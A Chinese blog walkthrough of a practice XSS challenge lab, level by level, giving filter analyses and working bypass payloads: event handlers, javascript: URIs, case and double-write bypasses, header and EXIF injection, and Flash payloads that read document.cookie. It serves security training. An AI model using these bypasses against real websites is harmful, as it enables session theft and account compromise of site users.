XSS挑战之旅平台通关练习

1、第一关

比较简单，测试语句：

<svg/onload=alert(1)>

<script>confirm(1)</script>

<script>prompt(1)</script>

<script>alert(1)</script>

html页面简单的三种对话框如下：

1、alert()，最简单的提示框：

alert("你好！");

2、confirm()，有确认和取消两个按钮：

if(confirm("还有继续吗？")){

alert("继续");

}else{

alert("再见");

}

3、prompt()，可以输入信息：

var name = prompt("你的名字是：");

alert("你好，" + name);

2、第二关

此处为搜索型的xss，分析代码，使用的是get方法，从url中接受一个keyword搜索参数，此处用到了一个过滤函数htmlspecialchars（），这个函数把预定义的字符转换为HTML实体，“>”和“<”转义了，属于黑名单绕过，那就是不使用被过滤的符号，使用js的事件，如：" onmouseover=alert(2) >click。还需要注意的地方就是前面的符号闭合.

另一个payload："><sript>alert(2)</script>，仍然是注意前面的闭合，就可以了。

3、第三关

这一关，过滤规则的更严格了，经过测试，“>”,“<”,“"”，被过滤了，但是单引号“'”，没有过滤，所以此处尝试js语句，“' onmouseover=alert(3)//”测试，后面无法闭合，所以使用了注释“//”。

4、第四关

研究一下源码，如下图，可以看到，传入进去的值经过了两个函数的参与，str_replace(">","",$str)，此函数是将变量str中的字符>转换为空，转换时区分大小写；同样也把<转换为空，然后再经过函数的过滤转化，这时要在没有符号“<>”，的情况下构造语句，并且不被htmlspecialchars()函数影响。所以这里可以构造一个输入到文本框后出现相应的事件。

Payload：" onfocus=alert(4) autofocus="

"onlick=alert(4)//

onfocus事件：定义的事件将在对象获得焦点时触发，这里指input标签获得焦点。

autofocus属性：input标签的属性，当页面加载input标签，自动获得焦点。

焦点：这里指你的光标的位置，也就是说当你的光标出现在input文本框这里，将进行onfocus事件的发生。

5、第五关

看一下源代码，$str2=str_replace("<script","scr_ipt",$str)，$str3=str_replace("on","o_n",$str2)是把<script转换为<scr_ipt，on转换成o_n，这样就过滤了js事件，$str=strtolower($_GET[''keyword"]);大小写绕过也会失效，不过这次没有过滤尖括号><。

这里用伪协议来构造payload：

"><iframe src=javascript:alert(5)>

"> <a href="jacascript:alert(5)">click me!!!</a>

"> <a href="javascript:%61lert(5)">click me !!!</a> //

6、第六关

经过查看源代码发现过滤了很多的字符，其中<script转换成<scr ipt，on转换成o_n，src转换成sr_c，data转换成da_ta，href转换成hr_ef，和上一关相比较这一关没有大小写的约束，于是可以变化大小写来绕过。

payload：

"> <SCRIpt>alert(6)</SCriPT>

"> <img Src=a ONerrOR=alert(6)>//

"> <a HrEf="javascript:alert(6)">click me!!!</a>//

"><svg x="" ONclick=alert(6)>

" ONclick=alert(6) //

7、第七关

根据代码显示，script，on，src，data，href都直接转换成空了，大小写也不能用了。所以尝试双写绕过。

payload：

"><scscriptript>alert(7)<sriscriptpt>

" oonnmouseover=alert(7)//

"><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>//

8、第八关

分析代码可知，

"script"转换为"scr_ipt"，"on"转换为"o_n"，"src"转换为"sr_c"，"data"转换为"da_ta"，"href"转换为"hr_ef"，'"'转换为'&quot'，大小写过滤并被编码，尖括号><，单引号'，%，#，&符号没有被过滤，输出点在a标签内，href属性中，属性里的双引号被转换成HTML实体，无法截断属性，这里可以使用伪协议绕过javascript:alert，由于script关键字被过滤，javascript会被替换成javasc_ript，使用&#x72来代替r,伪协议后面可以使用URL编码进行编码。

Payload：

javascript:alert(8)

javascript:%61lert(8)

javascript:%61lert`1`

javascript:alert`1`

9、第九关

"script"转换为"scr_ipt"，"on"转换为"o_n"，"src"转换为"sr_c"，"data"转换为"da_ta"，"href"转换为"hr_ef"，'"'转换为'&quot'，和上一关差不多，不同的是多了自动检测URL，如果发现没有带http://内容则会显示为不合法。

payload：

javascript:alert(9)//http://a.com //  利用注释

javascript:%0dhttp://a.com%0dalert(9) //  不利用注释

javascript:%0ahttp://a.com%0dalert(9) // 不利用注释

10、第十关

分析代码,发现需要两个参数，一个是keyword，一个是t_sort，尖括号<>都被转换成空，还有三个hidden的隐藏输入框，或许可以从隐藏的输入框下手，构造payload。

payload：

keyword=test&t_sort="type="text" onclick="alert(10)

查看页面源码：

Keyword=aaa&t_sort=" type="text" onmouseover="alert(10)

Keyword=aaa&t_sort=" type="text" onmouseover=alert｀1｀

11、第十一关

分析代码，相比上一关，多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入，使用burp抓包，修改相应的字段，构造http头部referer的payload。

头部本身没有Referer，自行添加了，

payload：Referer:" onmouseover=alert(11) type="text"

Referer:" onclick="alert(11)" type="text

12、第十二关

查看代码，$str11=$_SERVER['HTTP_USER_AGENT'];应该是User-Agent的http头部注入，burp抓包，构造头部User-Agent的payload。

User-Agent:" onmouseover=alert(12) type="text"

User-Agent:" onclick="alert(12)" type="text

13、第十三关

查看代码，这次是cookie类型的xss注入，setcookie("user", "call me maybe?", time()+3600);

构造payload：

Cookie:" onmouseover=alert(13) type="text"

Cookie:" onclick="alert(13)" type="text

14、第十四关

这一关的图片一直加载不出来，所以也没有办法进行测试了。于是在网上找了一些参考，自己记录一下：

查看源码发现exif，猜测应该是exif xss，但是这个链接由于网络的原因无法访问，exif xss，一般利用于文件上传的地方，最经典的就是头像上传，上传一个图片，该图片的exif元数据被修改为xss payload，成功利用弹窗，具体实现使用kali下的exiftool工具，命令如下：

exiftool -FIELD=XSS FILE

exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg

15、第十五关

查看代码，这一关是关于angular js的知识，ng-include有包含文件的意思，也就是相当于php里面的include，此处可以包含第一关的页面。

构造payload：

在url处写入语句，

src='level1.php?name=<img src=x onerror=alert(1)>'

如下图所示，这个没有利用成功，搜索到的另一个作者说是，因为这里需要访问angular.main.js这

个js文件，才能进行包含，虚拟机的环境中无法访问，看样子是需要fanqiang的，暂时无法实现，

最近国庆，抓的很严，我买的也挂掉了。。。

此处借用一张网上的成功图片吧。

2019/10/7更新：今天又弄了一个临时的vpn，紧接着就进行了测试，如下图显示，测试成功：

16、第十六关

查看代码发现大小写绕过失效，script、/、,等都被转换成&nbsp，这时，可以尝试使用%0a,%0d来进行绕过。

构造语句：

Keyword=<img%0dsrc=a%0donerror=alert(16)>

Keyword=<iframe%0dsrc=0%0donmouseover=alert｀16｀></iframe>

Keyword=<svg%0aonload=alert｀16｀></svg>

17、第十七关

测试语句：

arg01=a&arg02=%20onmouseover=alert`1`

18、第十八关

这一关和上一关一样。

19、第十九关

Flash xss

页面源码，未插入语句时：

页面源码，插入语句后：

Payload:

192.168.40.129/xss/level19.php?arg01=version&arg02=<ahref="javascript:alert(document.domain)">xss_by_didi</a>

点击“xss_by_didi”就可以触发XSS。弹窗：

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

网上找了下大神的答案，这里记录一下：

flash xss，需要对flash的反编译对源码进行分析，这里使用jpexs-decompiler来分析，首先定位getURL函数

然后追踪到sIFR的内容

得知version参数可以传入loc4变量中，即sIFR的内容中，但是getURL只在内容为link时打开，所以分析contentIsLink函数

所以我们可以构造<a > </a> 标签来传值

http://localhost/xss_test/level19.php?arg01=version&arg02=<ahref="javascript:alert(1)">111111</a>

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

20、第二十关

额……这一关完全没有头绪呀。。。答案是网上搜来的，测试代码“\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height”

看着就好难。说是将swf下载下来分析得知是zeroclipboard.swf，有漏洞详情，因此构造出的payload就是上面的那句话，我就直接放进去测试一下成功率吧。

level20.php?arg01=a&arg02=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height

成功弹窗：

转载声明:转载请保留原文链接及作者。